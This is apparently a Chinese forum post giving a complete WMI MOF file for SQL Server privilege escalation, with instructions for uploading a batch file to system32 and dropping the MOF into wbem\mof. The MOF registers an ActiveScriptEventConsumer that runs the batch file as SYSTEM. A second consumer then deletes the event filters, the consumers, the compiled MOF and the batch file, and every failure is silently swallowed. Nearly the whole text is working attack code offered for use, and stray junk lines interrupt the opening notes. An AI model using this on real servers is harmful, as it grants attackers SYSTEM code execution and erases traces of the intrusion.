这个 SQL 提权用的 MOF 通过 WMI 的 ActiveScriptEventConsumer 以 SYSTEM 身份执行脚本；脚本里只写了文件名 cmd.bat，没有写路径，所以文件是按脚本宿主的当前目录解析的，不能在 MOF 里另指定路径。
需要把要执行的命令写进 cmd.bat，上传到 system32 目录，再把这个 MOF 放到 wbem\mof 目录等待 WMI 编译执行。注意：wbem\mof 目录的自动编译只在 Windows XP / Server 2003 及更早版本上存在，Vista 之后已移除。
2 {! W8 e. p. W: p; Z- j4 l: U
这个 SQL 提权用的 MOF 通过 WMI 的 ActiveScriptEventConsumer 以 SYSTEM 身份执行脚本；脚本里只写了文件名 cmd.bat，没有写路径，所以文件是按脚本宿主的当前目录解析的，不能在 MOF 里另指定路径。
需要把要执行的命令写进 cmd.bat，上传到 system32 目录，然后执行。清理脚本里写死了 wbem\mof\good\hBsBa.mof 这个文件名，上传的 MOF 必须使用同样的文件名，否则编译后的副本不会被删除（删除失败会被 catch 吞掉，不会报错）。
9 D9 i q; Z6 ]' ?9 @6 a8 m6 e
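#pragma namespace("\\\\.\\root\\cimv2")

// Marker class. Creating the instance at the bottom of this file is the
// event that fires the first consumer ($cons); that consumer's own script
// deletes the class again once it has run.
class MyClass547
{
    [key] string Name;
};

// Minimal declaration of ActiveScriptEventConsumer so the compiler accepts
// the two instances below; the provider registration follows.
class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
    uint32 KillTimeout;
};

instance of __Win32Provider as $P
{
    Name = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

instance of __EventConsumerProviderRegistration
{
    Provider = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

// Consumer 1: runs cmd.bat, then removes the marker class, the creation
// filter and itself. s.Run() receives a bare file name, so cmd.bat is
// resolved against the script host's current directory (system32 per the
// accompanying note); no path is hard-coded here. Every step is wrapped in
// try/catch, so failures are silent.
instance of ActiveScriptEventConsumer as $cons
{
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText =
        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

// Consumer 2: clean-up. Deletes the compiled copy of this MOF under
// wbem\mof\good\, the batch file, and finally the deletion filter and this
// consumer. Both file paths are relative to the script host's current
// directory. The name hBsBa.mof is hard-coded: it must equal the name this
// MOF is dropped under, otherwise the compiled copy is left behind and the
// error is swallowed by the catch.
instance of ActiveScriptEventConsumer as $cons2
{
    Name = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText =
        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Fires once when the MyClass547 instance below is created.
instance of __EventFilter as $Filt
{
    Name = "instfilt";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
    QueryLanguage = "WQL";
};

// Fires when the process that hosted the batch file exits, which triggers
// the clean-up consumer. Win32_Process.Name is the image name, and a .bat
// started through WScript.Shell runs inside cmd.exe, so the earlier
// comparison against "cmd.bat" could never match and clean-up never ran.
// Caveat: any cmd.exe exiting on the host matches this filter, so clean-up
// may run early if an unrelated cmd.exe terminates first.
instance of __EventFilter as $Filt2
{
    Name = "qndfilt";
    Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.exe\"";
    QueryLanguage = "WQL";
};

instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter = $Filt;
};

instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter = $Filt2;
};

// Creating this instance is the trigger for $Filt / $cons.
instance of MyClass547 as $MyClass
{
    Name = "ClassConsumer";
};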